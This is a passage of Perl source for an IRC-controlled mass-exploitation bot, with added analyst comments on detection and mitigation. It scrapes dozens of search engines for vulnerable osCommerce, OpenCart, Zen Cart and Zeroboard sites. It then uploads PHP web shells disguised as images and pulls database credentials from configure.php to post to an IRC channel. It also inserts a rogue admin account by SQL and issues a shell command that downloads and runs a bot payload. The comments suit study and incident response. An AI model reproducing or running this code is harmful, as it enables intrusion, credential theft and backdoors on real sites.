  2087.                 &osco_shell_check($url,$chan,$site,$engine);
  2088.         }
  2089.         if ($resc->is_success()) {
  2090.                 &osco_shell_check($url,$chan,$site,$engine);
  2091.         }
  2092. }
  2093.  
  2094. sub osco_3() {
        # Same shape as osco_1(), for the banner-manager page: the response must
        # contain "TABLE_HEADING_BANNERS" before osco_xpl3() and osql() are
        # called from the double-forked grandchild.
        # Detection: admin/banner_manager.php/login.php requests answered with 200.
  2095.         my ($site,$chan,$bug,$engine) = @_;
  2096.     my $test = "http://".$site.$bug;
  2097.     my $html = &get_content($test);
  2098.         if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  2099.         if ($html =~ /TABLE_HEADING_BANNERS/) {
  2100.                         if ($conf{soscos} == 1) { &msg("$chan","$oscologo12(4@0$engine12)(4@7SYSTEM12)11 ".$test); }
  2101.                         &osco_xpl3($test,$chan,$site,$engine);
  2102.             &osql($chan,$site,$engine);
  2103.                 }
  2104.     } exit; sleep(2); }
  2105. }
  2106.  
  2107. sub osco_xpl3() {
        # Same four uploads as osco_xpl1(), sent to $url?action=insert in the
        # "banners_image" form field; the follow-up checks are identical.
        # Detection: POSTs to banner_manager.php with action=insert and a
        # ".jpg.php" filename in the multipart body.
  2108. my ($url,$chan,$site,$engine) = @_;
  2109. my $browser = LWP::UserAgent->new;
  2110. my $url    = $url."?action=insert";
  2111. my $res = $browser->post( $url,['banners_image' => ['./sh.jpg' => 'h4rd.jpg.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  2112. my $resa = $browser->post( $url,['banners_image' => ['./pbot.jpg' => 'pb.jpg.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  2113. my $resb = $browser->post( $url,['banners_image' => ['./sh.jpg' => '../h4rd.jpg.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  2114. my $resc = $browser->post( $url,['banners_image' => ['./sh.jpg' => 'banners/h4rd.jpg.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  2115.  
  2116.         if ($res->is_success()) {
  2117.                 if ($conf{oscupl} == 1) { &msg("$chan","$oscologo12(4@0$engine12)(4@7UPLOADED12)11 ".$url); }
  2118.                 &osco_shell_check($url,$chan,$site,$engine);
  2119.         }
  2120.         if ($resa->is_success()) {
  2121.                 &get_content("http://".$site."images/pb.jpg.php"); sleep(3); &get_content("http://".$site."pb.jpg.php");
  2122.         }
  2123.         if ($resb->is_success()) {
  2124.                 &osco_shell_check($url,$chan,$site,$engine);
  2125.         }
  2126.         if ($resc->is_success()) {
  2127.                 &osco_shell_check($url,$chan,$site,$engine);
  2128.         }
  2129. }
  2130.  
  2131. sub osco_shell_check() {
        # Fetches h4rd.jpg.php from banners/, images/ and the site root and calls
        # info_main() for each response containing the "ID: 0wn3d" marker markup.
        # $urli0..$urli2 are package globals; $url is accepted but not used.
        # Detection: GETs for h4rd.jpg.php in those three locations; a file of
        # that name on disk is a compromise indicator, not just a probe.
  2132. my ($url,$chan,$site,$engine) = @_;
  2133. $urli0 = "http://".$site."banners/h4rd.jpg.php";
  2134. $urli1 = "http://".$site."images/h4rd.jpg.php";
  2135. $urli2 = "http://".$site."h4rd.jpg.php";
  2136. my $check0 = &get_content($urli0);
  2137. my $check1 = &get_content($urli1);
  2138. my $check2 = &get_content($urli2);
  2139.  
  2140.     if ($check0 =~ /<b>ID:<\/b> 0wn3d<\/font><br>/ ) { &info_main($urli0,$chan,$engine,$oscologo); }
  2141.         if ($check1 =~ /<b>ID:<\/b> 0wn3d<\/font><br>/ ) { &info_main($urli1,$chan,$engine,$oscologo); }
  2142.         if ($check2 =~ /<b>ID:<\/b> 0wn3d<\/font><br>/ ) { &info_main($urli1,$chan,$engine,$oscologo); }
  2143.  
  2144. }
  2145.  
  2146. sub osql() {
        # Requests includes/configure.php through the file manager's download
        # action and, if the response contains "http://", passes the URL on to
        # osql_xpl() for parsing.
        # Detection: file_manager.php requests with action=download and a
        # filename pointing at configure.php.
        # Mitigation: treat any such request in the logs as a credential
        # exposure and rotate the database password.
  2147.     my ($chan,$site,$engine) = @_;
  2148.       my $test = "http://".$site."admin/file_manager.php/login.php?action=download&filename=/includes/configure.php";
  2149.       my $re   = &get_content($test);
  2150.          if ($re =~ /http:\/\//){
  2151.             &osql_xpl($test,$chan,$engine,$site);
  2152.         }
  2153.  }
  2154.  
  2155. sub osql_xpl() {
        # Re-fetches $url (17 second timeout) and extracts five define() values
        # from the returned configure.php text: DIR_FS_CATALOG, DB_SERVER,
        # DB_SERVER_USERNAME, DB_SERVER_PASSWORD and DB_DATABASE. Each hit is
        # appended to $dbinfo and flagged in the package-global @odbi; when all
        # five flags are set the collected values are sent to $chan.
        # $clr is a package global chosen by whether DB_SERVER is a local
        # address (localhost, localhost:3306, 127.0.0.1) or a remote one.
        # Mitigation: keep configure.php unreadable through any web-reachable
        # download feature and bind the database to local or allow-listed
        # clients so leaked credentials are not usable remotely.
  2156.      my ($url,$chan,$engine,$site) = @_;
  2157.      my $request   = HTTP::Request->new(GET=>$url);
  2158.      my $browser   = LWP::UserAgent->new();
  2159.         $browser->timeout(17);
  2160.         my $response  = $browser->request($request);
  2161.          if ($response->is_success) {
  2162.                         my $dbinfo = "";
  2163.                         my $res   = $response->as_string;
  2164.                           if ($res =~ m/'DIR_FS_CATALOG', '(.*)'/g) {
  2165.                                 $dbinfo = $dbinfo."14[+]pth:4 $1 ";
  2166.                             $odbi[0] = "1";
  2167.                           }
  2168.                           if ($res =~ m/'DB_SERVER', '(.*)'/g) {
  2169.                           if ($1 eq "localhost") { $clr = "4 "; }
  2170.                           elsif ($1 eq "localhost:3306") { $clr = "4 "; }
  2171.                           elsif ($1 eq "127.0.0.1") { $clr = "4 "; }
  2172.                           else { $clr = "12 "; }
  2173.                                 $dbinfo = $dbinfo."14[+]srv:".$clr.$1." ";
  2174.                                 $odbi[1] = "1";
  2175.                           }
  2176.                           if ($res =~ m/'DB_SERVER_USERNAME', '(.*)'/g) {
  2177.                                 $dbinfo = $dbinfo."14[+]usr:4 $1 ";
  2178.                                 $odbi[2] = "1";
  2179.                           }
  2180.                           if ($res =~ m/'DB_SERVER_PASSWORD', '(.*)'/g) {
  2181.                                 $dbinfo = $dbinfo."14[+]pwd:4 $1 ";
  2182.                                 $odbi[3] = "1";
  2183.                           }
  2184.                           if ($res =~ m/'DB_DATABASE', '(.*)'/g) {
  2185.                                 $dbinfo = $dbinfo."14[+]db:4 $1 ";
  2186.                                 $odbi[4] = "1";
  2187.                           }
  2188.                                 if ($odbi[0] == "1" && $odbi[1] == "1" && $odbi[2] == "1" && $odbi[3] == "1" && $odbi[4] == "1") {
  2189.                                         &msg("$chan","$ossqllogo12(4@0$engine12)12(4@3VULN12)4 http://".$site." ".$dbinfo." ");
  2190.                                 }      
  2191.                  }
  2192. }
  2193.  
  2194. ######################## OpenCart
  2195. sub op() {
        # For every host returned by search_engine(), fetches $site.$open_test
        # and, when the response matches $open_output (both defined outside this
        # block), announces the bundled FCKeditor test page on $chan and calls
        # op_xpl() with the editor's connector.php URL.
        # Detection: unauthenticated requests under
        # admin/view/javascript/fckeditor/editor/filemanager/connectors/.
        # Mitigation: remove the FCKeditor file-manager connectors and test
        # pages, or deny access to that directory at the web server.
  2196.         my ($chan,$bug,$dork,$engine) = @_;
  2197.     my $count = 0;
  2198.     my @list = &search_engine($chan,$bug,$dork,$engine,$oplogo);
  2199.     my $num = scalar(@list);
  2200.     if ($num > 0) {
  2201.         foreach my $site (@list) {
  2202.             $count++;
  2203.             if ($count == $num-1) { if ($conf{ssdone} == 1) { &msg("$chan","$oplogo(4@5$engine15)12 Scan finish"); } }
  2204.             my $test  = "http://".$site.$open_test;
  2205.                         my $tast = "http://".$site."admin/view/javascript/fckeditor/editor/filemanager/connectors/php/connector.php";
  2206.             my $vuln = "http://".$site."admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html";
  2207.             my $re   = &get_content($test);
  2208.             if ($re =~ /$open_output/){
  2209.             &msg("$chan", "$oplogo(4@5$engine15)(4@12VulN15)13 ".$vuln."15(4@UPLOAD15)");
  2210.                         &op_xpl($tast,$chan,$site,$engine);
  2211.             }
  2212.         }
  2213.     }
  2214. }
  2215. sub op_xpl() {
        # Posts the local file ./sh.jpg twice as "h4rd.php" in the "FileUpload"
        # field to an upload.php?Type=File path appended to $url, then fetches
        # h4rd.php and pb.php from the connectors/php/ directory of $site and
        # calls info_main() when the "ID: 0wn3d" marker markup is returned.
        # $hasil and $hasil1 hold the raw responses but are not used further.
        # Detection: multipart POSTs to the FCKeditor upload.php with a .php
        # filename, and new .php files appearing under connectors/php/.
  2216. my $browser = LWP::UserAgent->new;
  2217. my ($url,$chan,$site,$engine) = @_;
  2218. my $res  = $browser->post( $url."/admin/view/javascript/fckeditor/editor/filemanager/connectors/php/upload.php?Type=File",['FileUpload' => ['./sh.jpg' => 'h4rd.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  2219. my $res1  = $browser->post( $url."/admin/view/javascript/fckeditor/editor/filemanager/connectors/php/upload.php?Type=File",['FileUpload' => ['./sh.jpg' => 'h4rd.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  2220.     my $hasil = $res->as_string;
  2221.         my $hasil1 = $res1->as_string;
  2222.         my $dor = "http://".$site."admin/view/javascript/fckeditor/editor/filemanager/connectors/php/h4rd.php";
  2223.         my $dur = "http://".$site."admin/view/javascript/fckeditor/editor/filemanager/connectors/php/pb.php";
  2224.         my $check = &get_content($dor);
  2225.         &get_content($dur); sleep(1);
  2226.         if ($check =~ /<font face='verdana' size='2'><b>ID:<\/b> 0wn3d<\/font><br>/ ) { &info_main($dor,$chan,$engine,$timlogo);
  2227.         }
  2228. }
  2229.  
  2230. ######################## ZEN
  2231. sub zen() {
            # "ZEN" check driver. Args: ($chan, $bug, $dork, $engine).
            # For every host returned by search_engine() it fetches
            # http://<host>admin/sqlpatch.php/password_forgotten.php?action=execute
            # and calls zen_query() when the body contains "zc_install".
            # Defender note: a request for admin/sqlpatch.php with an extra
            # "/password_forgotten.php" path component appended is the signature
            # of this probe; presumably it targets Zen Cart admin installs
            # (inferred from the section header and the zc_install marker --
            # confirm). Keep the admin directory patched and access-restricted.
  2232.     my ($chan,$bug,$dork,$engine) = @_;
  2233.     my $count = 0;
  2234.     my @list = &search_engine($chan,$bug,$dork,$engine,$zenlogo);
  2235.     my $num = scalar(@list);
  2236.     if ($num > 0) {
  2237.         foreach my $site (@list) {
  2238.             $count++;
                    # "Scan finish" is announced at counter == $num-1 when $conf{ssdone} is 1.
  2239.             if ($count == $num-1) { if ($conf{ssdone} == 1) { &msg("$chan","$zenlogo12(4@0$engine12)10 Scan finish"); } }
  2240.             my $test  = "http://".$site."admin/sqlpatch.php/password_forgotten.php?action=execute";
  2241.             my $html  = &get_content($test);
  2242.                if ($html =~ /zc_install/){
  2243.                    &zen_query($chan,$site,$test,$engine);
  2244.                    }
  2245.                }
  2246.           }
  2247.      }
  2248. sub zen_query() {
            # Second stage of the "ZEN" check. Args: ($chan, $url, $test, $engine).
            # POSTs a form body "query_string=<SQL>" to $test, where the SQL is a
            # fixed INSERT into the admin table, and reports the host through
            # msg() when the response contains "1 statements processed" or
            # "Duplicate entry".
            # Indicators for incident response (all taken from the statement below):
            # an admin row with admin_id 773, admin_name 'Ha45K' and the listed
            # e-mail address. Audit the admin table for accounts nobody created
            # and rotate credentials if one is found.
  2249.     my ($chan,$url,$test,$engine) = @_;
  2250.     my $code  = "INSERT INTO admin (admin_id, admin_name, admin_email, admin_pass) VALUES (773,'Ha45K','Ha45K@hotmail.com','617ec22fbb8f201c366e9848c0eb6925:87');";
  2251.     my $req = HTTP::Request->new(POST => $test);
  2252.     $req->content_type("application/x-www-form-urlencoded");
            # The SQL text is concatenated into the body as-is (no URL encoding here).
  2253.     $req->content("query_string=".$code);
  2254.     my $ua = LWP::UserAgent->new(agent => $uagent);
  2255.     $ua->timeout(3);
  2256.     my $res = $ua->request($req);
            # as_string includes status line and headers, so the matches below run
            # over the whole response, not just the body.
  2257.     my $data = $res->as_string;
  2258.    if ( $data =~ /1 statements processed/i ) {
  2259.    &msg("$chan","$zenlogo12(4@0$engine12)(4@9VulN15)3 http://".$url."4admin/login.php 15(4@9user15)0 Ha45K 15(4@9pass15)0 wew");
  2260.    }
  2261.    elsif ( $data =~ /Duplicate entry/ ) {
  2262.    &msg("$chan","$zenlogo12(4@0$engine12)(4@9SuCcEs15)12 http://".$url."3admin/login.php 15(4@9user15)10 Ha45K 15(4@9pass15)10 wew");
  2263.    }
  2264. }
  2265. #########################################
  2266. sub zboard() {
            # "Zeroboard" check driver. Args: ($chan, $bug, $dork, $engine).
            # For every host from search_engine(): fetches http://<host><bug>?id=test,
            # and if the body mentions "Zeroboard" runs the local helper ./zero
            # (not part of this listing) against that URL, then looks for
            # /data/shell.php on the host. When that page answers with
            # "Cannot execute a blank command" it issues a cmd= request that
            # downloads $botshell and $injector with lwp-download and runs pb.php,
            # and finally checks h0rny.php under /data/ and /bbs/data/ for "0wn3d".
            # Indicators for defenders: files data/shell.php, h0rny.php, pb.php;
            # access-log entries with "shell.php?cmd=lwp-download"; outbound
            # fetches started by the web-server account. $botshell and $injector
            # are defined outside this excerpt.
            # Analyst note: system() is called with a single interpolated string,
            # so the command line is interpreted by a shell -- only examine this
            # sample in an isolated sandbox.
  2267.         my ($chan,$bug,$dork,$engine) = @_;
  2268.     my $count = 0;
  2269.     my @list = &search_engine($chan,$bug,$dork,$engine,$zerologo);
  2270.     my $num = scalar(@list);
  2271.     if ($num > 0) {
  2272.         foreach my $site (@list) {
  2273.             $count++;
  2274.                                 if ($count == $num-1) { if ($conf{ssdone} == 1) { &msg("$chan","$zerologo12(4@0$engine12)10 Scan finish"); } }
  2275.                                 my $action = "/data/shell.php?cmd=lwp-download%20".$botshell."%20h0rny.php;lwp-download%20".$injector."%20pb.php;php%20pb.php";
  2276.                                 my $test = "http://".$site.$bug."?id=test";
  2277.                                 my $chek = &get_content($test);
  2278.                                 if ($chek =~ /Zeroboard/) {
                                        # Exit status of ./zero is stored but never checked.
  2279.                                 my $cok = system("./zero $test 80");sleep(3);
  2280.                                 my $check2 = &get_content("http://".$site."/data/shell.php");
  2281.                                 if ($check2 =~ /Cannot execute a blank command/) {
  2282.                                 my $vuln = &get_content("http://".$site.$action);
  2283.                                 my $vulna = "http://".$site."/data/h0rny.php"; &get_content("http://".$site."/data/pb.php"); sleep(1);
  2284.                 my $vulnb = "http://".$site."/bbs/data/h0rny.php"; &get_content("http://".$site."/bbs/data/pb.php"); sleep(1);
  2285.                                 my $checka  = &get_content($vulna);sleep(1);
  2286.                                 my $checkb = &get_content($vulnb);
  2287.                                 if ($checka =~ /0wn3d/) { &info_main($vulna,$chan,$engine,$zerologo); }
  2288.                                 elsif ($checkb =~ /0wn3d/) { &info_main($vulnv,$chan,$engine,$zerologo); }
  2289.                                 }
  2290.                         }
  2291.                 }
  2292.         }
  2293. }
  2294.  
  2295. #########################################
  2296. sub search_engine() {
            # Dispatcher from an engine name to its scraper sub.
            # Args: ($chan, $bug, $dork, $engine, $logo). $engine is compared
            # case-sensitively against each known name; the matching scraper is
            # called with $dork and its results are appended to @total. The list
            # is then passed through clean() (defined elsewhere; presumably
            # de-duplication -- confirm) and returned.
            # When $conf{ssfind} is 1 the raw and cleaned counts are reported
            # through msg(). An unknown engine name yields an empty @total.
            # $bug is accepted but not used in this sub.
  2297.     my (@total,@clean);
  2298.         my ($chan,$bug,$dork,$engine,$logo) = @_;
  2299.     if ($engine eq "Google") { my @google = &google($dork); push(@total,@google); }
  2300.     if ($engine eq "Google2") { my @google2 = &google2($dork); push(@total,@google2); }
  2301.         if ($engine eq "GigaBlast") { my @gigablast = &gigablast($dork); push(@total,@gigablast); }
  2302.         if ($engine eq "EuroSeek") { my @euroseek = &euroseek($dork); push(@total,@euroseek); }
  2303.         if ($engine eq "Alltheweb") { my @alltheweb = &alltheweb($dork); push(@total,@alltheweb); }
  2304.     if ($engine eq "Rediff") { my @rediff = &rediff($dork); push(@total,@rediff); }
  2305.         if ($engine eq "Mamma") { my @mamma = &mamma($dork); push(@total,@mamma); }
  2306.     if ($engine eq "Bing") { my @bing = &bing($dork); push(@total,@bing); }
  2307.     if ($engine eq "Altavista") { my @altavista = &altavista($dork); push(@total,@altavista); }
  2308.     if ($engine eq "Yahoo") { my @yahoo = &yahoo($dork); push(@total,@yahoo); }
  2309.         if ($engine eq "Yahoo2") { my @yahoo2 = &yahoo2($dork); push(@total,@yahoo2); }
  2310.     if ($engine eq "Ask") { my @ask = &ask($dork); push(@total,@ask); }
  2311.     if ($engine eq "Uol") { my @uol = &uol($dork); push(@total,@uol); }
  2312.     if ($engine eq "Clusty") { my @clusty = &clusty($dork); push(@total,@clusty); }
  2313.     if ($engine eq "Gutser") { my @gutser = &gutser($dork); push(@total,@gutser); }
  2314.     if ($engine eq "Exalead") { my @exalead = &exalead($dork); push(@total,@exalead); }
  2315.     if ($engine eq "Lycos") { my @lycos = &lycos($dork); push(@total,@lycos); }
  2316.     if ($engine eq "Virgilio") { my @virgilio = &virgilio($dork); push(@total,@virgilio); }
  2317.     if ($engine eq "Webde") { my @webde = &webde($dork); push(@total,@webde); }
  2318.     if ($engine eq "Hotbot") { my @hotbot = &hotbot($dork); push(@total,@hotbot); }
  2319.     if ($engine eq "Aol") { my @aol = &aol($dork); push(@total,@aol); }
  2320.     if ($engine eq "Sapo") { my @sapo = &sapo($dork); push(@total,@sapo); }
  2321.     if ($engine eq "Duck") { my @duck = &duck($dork); push(@total,@duck); }
  2322.     if ($engine eq "Yause") { my @yause = &yause($dork); push(@total,@yause); }
  2323.     if ($engine eq "Baidu") { my @baidu = &baidu($dork); push(@total,@baidu); }
  2324.     if ($engine eq "Black") { my @black = &black($dork); push(@total,@black); }
  2325.     if ($engine eq "Onet") { my @onet = &onet($dork); push(@total,@onet); }
  2326.     if ($engine eq "Sizuka") { my @sizuka = &sizuka($dork); push(@total,@sizuka); }
  2327.     if ($engine eq "Walla") { my @walla = &walla($dork); push(@total,@walla); }
  2328.     if ($engine eq "Demos") { my @demos = &demos($dork); push(@total,@demos); }
  2329.     if ($engine eq "Rose") { my @rose = &rose($dork); push(@total,@rose); }
  2330.     if ($engine eq "Seznam") { my @seznam = &seznam($dork); push(@total,@seznam); }
  2331.     if ($engine eq "Tiscali") { my @tiscali = &tiscali($dork); push(@total,@tiscali); }
  2332.     if ($engine eq "Naver") { my @naver = &naver($dork); push(@total,@naver); }
  2333.         if ($engine eq "AmiDalLa") { my @amidalla = &amidalla($dork); push(@total,@amidalla); }
  2334.         if ($engine eq "BusCaR") { my @buscar = &buscar($dork); push(@total,@buscar); }
  2335.         if ($engine eq "KvaSiR") { my @kvasir = &kvasir($dork); push(@total,@kvasir); }
  2336.         if ($engine eq "eXciTe") { my @excite = &excite($dork); push(@total,@excite); }
  2337.         if ($engine eq "InteRia") { my @interia = &interia($dork); push(@total,@interia); }
  2338.         if ($engine eq "SnZ") { my @snz = &snz($dork); push(@total,@snz); }
  2339.         if ($engine eq "RambLer") { my @rambler = &rambler($dork); push(@total,@rambler); }
  2340.         if ($engine eq "YaNdeX") { my @yandex = &yandex($dork); push(@total,@yandex); }
  2341.         if ($engine eq "DooGatE") { my @doogate = &doogate($dork); push(@total,@doogate); }
  2342.         if ($engine eq "sogou") { my @sogou = &sogou($dork); push(@total,@sogou); }
  2343.         if ($engine eq "joeant") { my @joeant = &joeant($dork); push(@total,@joeant); }
  2344.         if ($engine eq "terra") { my @terra = &terra($dork); push(@total,@terra); }
  2345.         if ($engine eq "youdao") { my @youdao = &youdao($dork); push(@total,@youdao); }
  2346.         if ($engine eq "amfibi") { my @amfibi = &amfibi($dork); push(@total,@amfibi); }
  2347.         if ($engine eq "bigclique") { my @bigclique = &bigclique($dork); push(@total,@bigclique); }
  2348.         if ($engine eq "dancefloor") { my @dancefloor = &dancefloor($dork); push(@total,@dancefloor); }
  2349.         if ($engine eq "rakuten") { my @rakuten = &rakuten($dork); push(@total,@rakuten); }
  2350.         if ($engine eq "nova") { my @nova = &nova($dork); push(@total,@nova); }
  2351.         if ($engine eq "nadji") { my @nadji = &nadji($dork); push(@total,@nadji); }
  2352.         if ($engine eq "goo") { my @goo = &goo($dork); push(@total,@goo); }
  2353.         if ($engine eq "uksubmit") { my @uksubmit = &uksubmit($dork); push(@total,@uksubmit); }
  2354.         ###### nieuwe ######                   
  2355.         if ($engine eq "NetSprint") { my @netsprint = &netsprint($dork); push(@total,@netsprint); }
  2356.         if ($engine eq "sAol") { my @saol = &saol($dork); push(@total,@saol); }
  2357.     if ($engine eq "Lookle") { my @lookle = &lookle($dork); push(@total,@lookle); }
  2358.     if ($engine eq "optusZoo") { my @optuszoo = &optuszoo($dork); push(@total,@optuszoo); }
  2359.         if ($engine eq "Search66") { my @search66 = &search66($dork); push(@total,@search66); }
  2360.         if ($engine eq "Arrama") { my @arrama = &arrama($dork); push(@total,@arrama); }
  2361.         if ($engine eq "eXciteJP") { my @excitejp = &excitejp($dork); push(@total,@excitejp); }
  2362.     if ($engine eq "BigLobe") { my @biglobe = &biglobe($dork); push(@total,@biglobe); }
  2363.         if ($engine eq "Clix") { my @clix = &clix($dork); push(@total,@clix); }
  2364.         if ($engine eq "SearchCH") { my @searchch = &searchch($dork); push(@total,@searchch); }
  2365.         if ($engine eq "Cada") { my @cada = &cada($dork); push(@total,@cada); }
  2366.         ####################
  2367.         @clean = &clean(@total);
  2368.         if ($conf{ssfind} == 1) {
  2369.                 &msg("$chan","$logo12(4@0$engine12)8 ".scalar(@total)." 14-14«15¤14»14-13 ".scalar(@clean)." ");
  2370.         }
  2371.         return @clean;
  2372. }
  2373.  
  2374. #########################################
  2375.  
  2376. sub isFound() {
            # Returns 1 when the body fetched from $_[0] matches the pattern in
            # $_[1], otherwise 0. The second argument is interpolated into the
            # match unescaped, so it is treated as a regular expression.
  2377.     my $status = 0;
  2378.     my $link = $_[0];
  2379.     my $reqexp = $_[1];
  2380.     my $res = &get_content($link);
  2381.     if ($res =~ /$reqexp/) { $status = 1 }
  2382.     return $status;
  2383. }
  2384.  
  2385. sub timFound() {
                # Like isFound(), but issues its own GET (12 s timeout, default
                # LWP user agent string) and only tests successful responses.
                # Args: URL, pattern. Returns 1 on a match, else 0.
                # The match runs over $response->as_string, i.e. status line and
                # headers as well as the body.
  2386.         my $status = 0;
  2387.         my $url    = $_[0];
  2388.         my $reqexp = $_[1];
                # $site is built here but not referenced again in this sub.
  2389.         my $site   = $url."sh.php";
  2390.         my $request   = HTTP::Request->new(GET=>$url);
  2391.         my $browser   = LWP::UserAgent->new();
  2392.                 $browser->timeout(12);
  2393.                 my $response  = $browser->request($request);
  2394.                 if ($response->is_success) {
  2395.                 my $res   = $response->as_string;
  2396.                 if ($res =~ m/$reqexp/g ) { $status = 1 }
  2397.                 }
  2398. return $status;
  2399. }
  2400.  
  2401. sub get_content() {
            # Shared HTTP GET helper: fetches $_[0] with the user agent string
            # $uagent (defined outside this excerpt) and a 12 second timeout.
            # Returns $res->content without checking the status, so callers also
            # receive the bodies of error responses.
            # Defender note: every probe in this file that goes through this
            # helper carries the same User-Agent value, which makes that value a
            # candidate for log correlation.
  2402.     my $url = $_[0];
  2403.     my $ua = LWP::UserAgent->new(agent => $uagent);
  2404.     $ua->timeout(12);
  2405.     my $req = HTTP::Request->new(GET => $url);
  2406.     my $res = $ua->request($req);
  2407.     return $res->content;
  2408. }
  2409.  
  2410. #sub post_content() {
  2411. #    my $url = $_[0];
  2412. #       my ($host,$bug) = split('\?', $url);
  2413. #    my $req = HTTP::Request->new(POST => $host);
  2414. #    $req->content($bug);
  2415. #    my $ua = LWP::UserAgent->new(agent => $uagent);
  2416. #    $ua->timeout(10);
  2417. #    my $res = $ua->request($req);
  2418. #    return $res->content;
  2419. #}
  2420.  
  2421.  
  2422. sub post_content() {
        # HTTP POST helper. Splits $_[0] on "?" and sends the second piece as a
        # form-urlencoded body to the first piece, using the $uagent string.
        # Returns the response content on success; there is no explicit return
        # value on failure. No timeout is set here.
        # $ua, $req and $res are assigned without "my" in this sub.
  2423. my $url = $_[0];
  2424. my ($host,$bug) = split('\?', $url);
  2425.        
  2426.   $ua = LWP::UserAgent->new(agent => $uagent);
  2427.   $req = HTTP::Request->new(POST => $host);
  2428.   $req->content_type('application/x-www-form-urlencoded');
  2429.   $req->content($bug);
  2430.   $res = $ua->request($req);
  2431.   if ($res->is_success) {
  2432.     return $res->content;
  2433.   }
  2434. }
  2435.  
  2436. ######################################### SEARCH ENGINE
  2437. sub google() {
            # Result scraper for www.google.com. Arg: the search string.
            # Requests ten result pages (start = 1, 101, ... 901; num=100 each),
            # captures the host part of every http:// link in the HTML, skips
            # hosts containing "google", strips "<" and spaces, and collects what
            # links() returns. key(), links() and search_engine_query() are
            # defined outside this excerpt.
            # Seen from the provider side this is a burst of scripted, paged
            # queries for a single search string.
  2438.     my @list;
  2439.     my $key = $_[0];
  2440.     for (my $i=1; $i<=1000; $i+=100){
  2441.         my $search = ("http://www.google.com/search?q=".&key($key)."&num=100&filter=0&start=".$i);
  2442.         my $res = &search_engine_query($search);
  2443.         while ($res =~ m/http:\/\/([^>\"]*)\//g) {
  2444.             my $link = $1; if ($link!~ /google/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2445.         }
  2446.     }
  2447. return @list;
  2448. }
  2449. ############### GOED
  2450. sub google2() {
          # Result scraper for country-specific Google hosts. Arg: the search string.
          # @doms lists the domain suffixes; $dom receives one of them at random.
          # The request URL itself is assembled from $domain, the encoded search
          # string and $b. Link extraction and filtering are the same as in
          # google(): hosts containing "google" are skipped, the rest go
          # through links().
  2451.   my @list;
  2452.   my $key = $_[0];
  2453.   my @doms = ("com","ad","ae","com.af","com.ag","com.ai","am","co.ao","com.ar","as","at","com.au","az","ba","com.bd","be","bf","bg","com.bh","bi","bj","com.bn","com.bo","com.br","bs","co.bw","by","com.bz","ca","cd","cf","cg","ch","ci","co.ck","cl","cm","cn","com.co","co.cr","com.cu","cv","cz","de","dj","dk","dm","com.do","dz","com.ec","ee","com.eg","es","com.et","fi","com.fj","fm","fr","ga","ge","gg","com.gh","com.gi","gl","gm","gp","gr","com.gt","gy","com.hk","hn","hr","ht","hu","co.id","ie","co.il","im","co.in","iq","is","it","je","com.jm","jo","co.jp","co.ke","com.kh","ki","kg","co.kr","com.kw","kz","la","com.lb","li","lk","co.ls","lt","lu","lv","com.ly","co.ma","md","me","mg","mk","ml","mn","ms","com.mt","mu","mv","mw","com.mx","com.my","co.mz","com.na","com.nf","com.ng","com.ni","ne","nl","no","com.np","nr","nu","co.nz","com.om","com.pa","com.pe","com.ph","com.pk","pl","pn","com.pr","ps","pt","com.py","com.qa","ro","ru","rw","com.sa","com.sb","sc","se","com.sg","sh","si","sk","com.sl","sn","so","sm","st","com.sv","td","tg","co.th","com.tj","tk","tl","tm","tn","to","com.tr","tt","com.tw","co.tz","com.ua","co.ug","co.uk","com.uy","co.uz","com.vc","co.ve","vg","co.vi","com.vn","vu","ws","rs","co.za","co.zm","co.zw","cat");
  2454.   my $dom = $doms[rand(scalar(@doms))];
  2455.     for (my $i=1; $i<=1000; $i+=100) {
  2456.         my $search = ("http://www.google.".$domain."/search?num=50&q=".&key($key)."&start=".$b."&sa=N");
  2457.         my $res = &search_engine_query($search);
  2458.         while ($res =~ m/http:\/\/([^>\"]*)\//g) {
  2459.             my $link = $1; if ($link!~ /google/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2460.         }
  2461.     }
  2462. return @list;
  2463. }
  2464. #### GOED
  2465. sub gigablast(){
            # Result scraper for www.gigablast.com. Arg: the search string.
            # Ten page requests (n = 1, 101, ... 901); hosts captured from http://
            # links are skipped when they contain "gigablast", otherwise cleaned
            # and passed to links(). The loop counter is the package variable $b.
  2466.     my @list;
  2467.         my $key = $_[0];
  2468.         for ($b=1; $b<=1000; $b+=100) {
  2469.         my $search = ("http://www.gigablast.com/search?q=".&key($key)."&n=".$b."");
  2470.         my $res = &search_engine_query($search);
  2471.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2472.             my $link = $1; if ($link!~ /gigablast/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2473.                 }
  2474.     }
  2475. return @list;
  2476. }
  2477. #### ?
  2478. sub euroseek() {
                # Result scraper for euroseek.com. Arg: the search string.
                # Ten page requests (start = 1, 101, ... 901). The outer $link
                # holds the fetched page; the inner "my $link" shadows it with the
                # captured host, which is skipped when it contains "euroseek" and
                # otherwise cleaned and passed to links().
  2479.         my @list;
  2480.         my $key = $_[0];
  2481.         for ($b=1; $b<=1000; $b+=100) {
  2482.                 my $search = "http://euroseek.com/system/search.cgi?mode=internet&start=".$b."&string=".&key($key)."";
  2483.                 my $link = &search_engine_query($search);
  2484.                 while ( $link =~ m/http:\/\/(.+?)\//g) {
  2485.                         my $link = $1; if ($link!~ /euroseek/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = links($link); push(@list,@grep); }
  2486.                 }
  2487.         }
  2488. return @list;
  2489. }
  2490. #### -
  2491. sub alltheweb() {
          # Result scraper for www.alltheweb.com. Arg: the search string.
          # Eleven page requests (o = 0, 100, ... 1000, hits=500); captured hosts
          # containing "alltheweb" are skipped, the rest are cleaned and passed
          # to links(). The loop counter $i is not declared with "my" here.
  2492.   my @list;
  2493.   my $key = $_[0];
  2494.     for ($i = 0;$i <= 1000;$i += 100) {
  2495.         my $search = ("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=500&q=".key($key)."&o=".$i."");
  2496.         my $res = &search_engine_query($search);
